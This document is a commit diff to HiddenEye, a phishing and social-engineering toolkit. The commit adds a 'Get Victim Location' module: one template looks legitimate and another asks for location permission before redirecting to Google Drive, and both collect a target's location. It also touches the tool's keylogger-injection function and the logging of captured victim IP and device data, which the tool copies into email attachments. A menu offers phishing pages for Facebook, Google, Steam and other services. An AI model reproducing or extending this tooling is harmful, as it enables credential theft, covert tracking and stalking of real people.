Location Tracking Tools Added ! (#500)

** Fixed #486 #484 #488 #495 #499 
** Added Location Tracking Tools ( Templates Made BY: @thewhiteh4t )
This commit is contained in:
AnonUD4Y 2020-01-20 08:27:13 +00:00 committed by GitHub
parent d1334e3211
commit 47e7b2fc5a
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23

View File

@ -34,7 +34,7 @@ MAIN0, MAIN1, MAIN2, MAIN3, MAIN4 = colorTheme[0], colorTheme[
def runPhishing(page, customOption): # Phishing pages selection menu def runPhishing(page, customOption): # Phishing pages selection menu
system('rm -Rf Server/www/*.* && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ && rm -rf link.url') system('rm -r Server/www/ && mkdir Server/www && touch Server/www/usernames.txt && touch Server/www/ip.txt && cp WebPages/ip.php Server/www/ && cp WebPages/KeyloggerData.txt Server/www/ && cp WebPages/keylogger.js Server/www/ && cp WebPages/keylogger.php Server/www/ && rm -rf link.url')
if customOption == '1' and page == 'Facebook': if customOption == '1' and page == 'Facebook':
copy_tree("WebPages/fb_standard/", "Server/www/") copy_tree("WebPages/fb_standard/", "Server/www/")
elif customOption == '2' and page == 'Facebook': elif customOption == '2' and page == 'Facebook':
@ -147,6 +147,20 @@ def runPhishing(page, customOption): # Phishing pages selection menu
print("\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder...".format(MAIN0, MAIN4)) print("\n {0}[{1}*{0}]{1} Copying Your Files To Server/www Folder...".format(MAIN0, MAIN4))
sleep(3) sleep(3)
copy_tree('WebPages/CUSTOM(2)/', "Server/www/") copy_tree('WebPages/CUSTOM(2)/', "Server/www/")
# Tools Below && Phishing Pages Above
elif customOption == '1' and page == 'LOCATION':
sleep(3)
copy_tree('WebPages/TOOLS/nearyou', "Server/www/")
print("\n\n{0}[{1}*{0}]{1} PLEASE USE TUNNELS/URL WITH '{0}https{1}' \n{0}[{1}*{0}]{1} Browsers Trusts only Https Links To Share Location\n".format(MAIN0, MAIN4))
input('\nPress Enter To continue...')
elif customOption == '2' and page == 'LOCATION':
sleep(3)
copy_tree('WebPages/TOOLS/gdrive', "Server/www/")
print("\n\n{0}[{1}*{0}]{1} PLEASE USE TUNNELS/URL WITH '{0}https{1}' \n{0}[{1}*{0}]{1} Browsers Trusts only Https Links To Share Location\n{0}[{1}*{0}]{1} {0}Tip: {1}Use Google Drive File Url as Custom Url while asked.".format(MAIN0, MAIN4))
input('\nPress Enter To continue...')
else: else:
endMessage(port) endMessage(port)
@ -627,6 +641,7 @@ def mainMenu():
{3}[{2} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {3}] {3}[{2} PHISHING-KEYLOGGER-INFORMATION COLLECTOR-ALL_IN_ONE_TOOL-SOCIALENGINEERING {3}]
________________________________________________________________________________'''.format(MAIN3, MAIN4, MAIN2, MAIN0, version)) ________________________________________________________________________________'''.format(MAIN3, MAIN4, MAIN2, MAIN0, version))
print("------------------------\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n------------------------".format(MAIN0, MAIN2)) print("------------------------\nSELECT ANY ATTACK VECTOR FOR YOUR VICTIM:\n------------------------".format(MAIN0, MAIN2))
print("\n{0}PHISHING-MODULES:".format(MAIN0, MAIN2))
print(" {0}[{1}01{0}]{1} Facebook {0}[{1}13{0}]{1} Steam {0}[{1}25{0}]{1} Badoo {0}[{1}37{0}]{1} PlayStation".format(MAIN0, MAIN2)) print(" {0}[{1}01{0}]{1} Facebook {0}[{1}13{0}]{1} Steam {0}[{1}25{0}]{1} Badoo {0}[{1}37{0}]{1} PlayStation".format(MAIN0, MAIN2))
print(" {0}[{1}02{0}]{1} Google {0}[{1}14{0}]{1} VK {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}38{0}]{1} Xbox".format( print(" {0}[{1}02{0}]{1} Google {0}[{1}14{0}]{1} VK {0}[{1}26{0}]{1} CryptoCurrency {0}[{1}38{0}]{1} Xbox".format(
MAIN0, MAIN2)) MAIN0, MAIN2))
@ -650,8 +665,10 @@ ________________________________________________________________________________
MAIN0, MAIN2)) MAIN0, MAIN2))
print(" {0}[{1}12{0}]{1} Microsoft {0}[{1}24{0}]{1} Adobe {0}[{1}36{0}]{1} Subito.it ".format( print(" {0}[{1}12{0}]{1} Microsoft {0}[{1}24{0}]{1} Adobe {0}[{1}36{0}]{1} Subito.it ".format(
MAIN0, MAIN2)) MAIN0, MAIN2))
print("\n{0}SOCIAL-ENGINEERING-TOOLS:".format(MAIN0, MAIN2))
print(" {0}[{1}A{0}]{1} Get Victim Location".format(MAIN0, MAIN2))
option = input("{0}HiddenEye >>> {1}".format(MAIN0, MAIN2)) option = input("\n{0}HiddenEye >>> {1}".format(MAIN0, MAIN2))
if option == '1' or option == '01': if option == '1' or option == '01':
loadModule('Facebook') loadModule('Facebook')
customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2)) customOption = input("\nOperation mode:\n {0}[{1}1{0}]{1} Standard Page Phishing\n {0}[{1}2{0}]{1} Advanced Phishing-Poll Ranking Method(Poll_mode/login_with)\n {0}[{1}3{0}]{1} Facebook Phishing- Fake Security issue(security_mode) \n {0}[{1}4{0}]{1} Facebook Phising-Messenger Credentials(messenger_mode) \n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2))
@ -815,12 +832,21 @@ ________________________________________________________________________________
loadModule('CUSTOM(2)') loadModule('CUSTOM(2)')
customOption = '' customOption = ''
runPhishing('CUSTOM(2)', customOption) runPhishing('CUSTOM(2)', customOption)
#Below Are Tools And Above Are Phishing Modules..
elif option == 'A' or option == 'a':
loadModule('LOCATION')
customOption = input(
"\nOperation mode:\n {0}[{1}1{0}]{1} NEAR YOU (Webpage Looks Like Legitimate)\n {0}[{1}2{0}]{1} GDRIVE (Asks For Location Permission To redirect GDRIVE) \n\n{0}HiddenEye >>> {2}".format(MAIN0, MAIN2, MAIN2))
runPhishing('LOCATION', customOption)
else: else:
endMessage(port) endMessage(port)
def loadModule(module): # This one just show text.. def loadModule(module): # This one just show text..
print(''' {0} print('''\n {0}
[{1}*{0}] SELECT ANY ONE MODE...{0}\n--------------------------------'''.format(MAIN0, MAIN2)) [{1}*{0}] SELECT ANY ONE MODE...{0}\n--------------------------------'''.format(MAIN0, MAIN2))
@ -841,6 +867,15 @@ def inputCustom(): # Question where user can input custom web-link
pass pass
else: else:
custom = 'http://' + custom custom = 'http://' + custom
if path.exists('Server/www/js/location.js'): # For Location (gdrive) Template Redirection.
with open('Server/www/js/location.js') as f:
read_data = f.read()
c = read_data.replace('<CUSTOM>', custom)
f = open('Server/www/js/location.js', 'w')
f.write(c)
f.close()
if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'): if path.exists('Server/www/post.php') and path.exists('Server/www/login.php'):
with open('Server/www/login.php') as f: with open('Server/www/login.php') as f:
read_data = f.read() read_data = f.read()
@ -855,6 +890,7 @@ def inputCustom(): # Question where user can input custom web-link
f = open('Server/www/post.php', 'w') f = open('Server/www/post.php', 'w')
f.write(c) f.write(c)
f.close() f.close()
else: else:
with open('Server/www/login.php') as f: with open('Server/www/login.php') as f:
read_data = f.read() read_data = f.read()
@ -1014,7 +1050,7 @@ def addkeylogger():
f = open('Server/www/index.html', 'w') f = open('Server/www/index.html', 'w')
f.write(c) f.write(c)
f.close() f.close()
print("\n{0}[{1}#{0}]Keylgger{0} ADDED !!!".format(MAIN0, MAIN4)) print("\n{0}[{1}#{0}]Keylogger{0} ADDED !!!".format(MAIN0, MAIN4))
sleep(2) sleep(2)
else: else:
with open('Server/www/index.php') as f: with open('Server/www/index.php') as f:
@ -1024,7 +1060,7 @@ def addkeylogger():
f = open('Server/www/index.php', 'w') f = open('Server/www/index.php', 'w')
f.write(c) f.write(c)
f.close() f.close()
print("\n{0}[{1}#{0}]Keylgger{0} ADDED !!!".format(MAIN0, MAIN4)) print("\n{0}[{1}#{0}]Keylogger{0} ADDED !!!".format(MAIN0, MAIN4))
sleep(2) sleep(2)
@ -1100,26 +1136,8 @@ def getCredentials(port):
with open('Server/www/ip.txt') as creds: with open('Server/www/ip.txt') as creds:
lines = creds.read().rstrip() lines = creds.read().rstrip()
if len(lines) != 0: if len(lines) != 0:
ip = re.search("Victim Public IP: (\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3})[\n,\r]", lines).group(1) writeLog('\n {0}[{1} DEVICE DETAILS FOUND {0}]{1}:\n {0}{2}{1}'.format(
user = re.match('Current logged in user: (a-z0-9)\n', lines) MAIN2, MAIN3, lines))
resp = urlopen('https://ipinfo.io/{0}/json'.format(ip))
ipinfo = json.loads(resp.read().decode(
resp.info().get_param('charset') or 'utf-8'))
if 'bogon' in ipinfo:
print(' \n\n{0}[ VICTIM IP BONUS ]{1}:\n {0}{2}{1}'.format(
MAIN0, MAIN2, lines))
else:
matchObj = re.match('^(.*?),(.*)$', ipinfo['loc'])
latitude = matchObj.group(1)
longitude = matchObj.group(2)
writeLog(' \n\n{0}[ VICTIM INFO FOUND ]{1}:\n{0}{2}{1}'.format(
MAIN3, MAIN2, lines))
writeLog(' \n{0}Longitude: {2} \nLatitude: {3}{1}'.format(
MAIN3, MAIN2, longitude, latitude))
writeLog(' \n{0}ISP: {2} \nCountry: {3}{1}'.format(
MAIN3, MAIN2, ipinfo['org'], ipinfo['country']))
writeLog(' \n{0}Region: {2} \nCity: {3}{1}'.format(
MAIN3, MAIN2, ipinfo['region'], ipinfo['city']))
system('touch Server/CapturedData/ip.txt && cat Server/www/ip.txt >> Server/CapturedData/ip.txt && cp Server/CapturedData/ip.txt Defs/Send_Email/attachments/ip.txt && rm -rf Server/www/ip.txt && touch Server/www/ip.txt') system('touch Server/CapturedData/ip.txt && cat Server/www/ip.txt >> Server/CapturedData/ip.txt && cp Server/CapturedData/ip.txt Defs/Send_Email/attachments/ip.txt && rm -rf Server/www/ip.txt && touch Server/www/ip.txt')
creds.close() creds.close()